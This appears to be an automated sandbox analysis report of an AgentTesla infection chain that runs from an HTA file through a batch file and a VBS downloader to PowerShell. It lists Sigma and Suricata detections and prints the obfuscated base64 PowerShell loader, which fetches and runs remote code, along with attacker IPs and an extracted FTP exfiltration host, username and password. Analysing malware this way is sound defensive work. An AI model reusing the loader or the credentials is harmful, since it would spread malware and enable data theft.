                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7404, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ProcessId: 7460, ProcessName: cmd.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
                        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7404, TargetFilename: C:\Windows\Temp\misdivide.bat
                        Sigma detected: Script Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\octupole.vbs", ProcessId: 7512, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); In

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-04T11:56:57.117400+010020204231Exploit Kit Activity Detected192.3.220.1780192.168.2.449735TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-04T11:56:49.533534+010020576351A Network Trojan was detected192.3.220.1780192.168.2.449735TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-04T11:56:56.106135+010020490381A Network Trojan was detected142.215.209.72443192.168.2.449734TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-04T11:56:49.533534+010028582951A Network Trojan was detected192.3.220.1780192.168.2.449735TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.rvoccte.com", "Username": "mybloddycockcpanel_owner@rvoccte.com", "Password": "ft]@0i!$%!ho"}
                        Joe Sandbox ML detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 142.215.209.72:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49831 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49832 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2microsoft.win32.taskschedulertasksetsecurityoptionsmicrosoft.win32.taskschedulertaskeventwatcherdnlib.dotnetbyrefsigdnlib.dotnetptrsigdnlib.dotnet.mdrawtyperefrowdnlib.dotnetgenericargumentsdnlib.dotnetimemberdefdnlib.dotnetpropertyattributesdnlib.dotnettypeequalitycomparerdnlib.dotnetconstantuserdnlib.dotnet.mdraweventptrrowdnlib.dotnetimporteroptionsdnlib.dotnetfiledefuserdnlib.dotnet.writerblobheapdnlib.dotnetgenericparamconstraintuserdnlib.dotnetpublickeybasednlib.dotnetmodulesigeventfilterdnlib.dotnetaccesscheckerdnlib.dotnetclasssigdnlib.dotnetmanifestresourceattributesdnlib.threadingicancellationtokendnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.mdstorageflagsdnlib.dotnetassemblyrefdnlib.dotneteventdefuserdnlib.dotnetmodulecontextdnlib.dotnetimportresolverdnlib.dotnetiresolutionscopednlib.dotnet.resourcesuserresourcetypednlib.dotnetmethodoverridednlib.dotnet.mdimagecor20headerdnlib.dotnet.writerstartupstubdnlib.dotnetrecursioncountermicrosoft.win32.taskscheduler.fluentbasebuilderdnlib.pervadnlib.threadingenumerableiteratedelegate`1microsoft.win32.taskschedulertaskaccessrulednlib.dotnet.writermetadataeventdnlib.dotnetiistypeormethoddnlib.dotnetmoduledefuserdnlib.dotnet.emitlocaldnlib.dotnet.resourcesbuiltinresourcedatamicrosoft.win32.taskschedulertriggercollectiondnlib.dotnetarraysigdnlib.dotnetcustomattributereaderdnlib.dotnetinterfaceimplusermicrosoft.win32.taskschedulertriggermicrosoft.codeanalysisembeddedattributednlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskprincipalprivilegednlib.utilsextensionsdnlib.dotnet.mdrawassemblyrowdnlib.dotnet.mdrawparamrowdnlib.dotnetmemberrefdnlib.dotnetihasconstantdnlib.dotnetmethodimplattributesdnlib.dotneticorlibtypesdnlib.dotnet.writermethodbodywriterdnlib.dotnetihascustomattributednlib.dotnet.emitinstructiondnlib.dotnet.mdrawtypedefrowdnlib.dotnetiscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbimage_debug_directory source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp

                        Spreading

                        barindex
                        Yara detected VBS Downloader Generic
                        Source: Yara matchFile source: C:\Windows\Temp\octupole.vbs, type: DROPPED

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
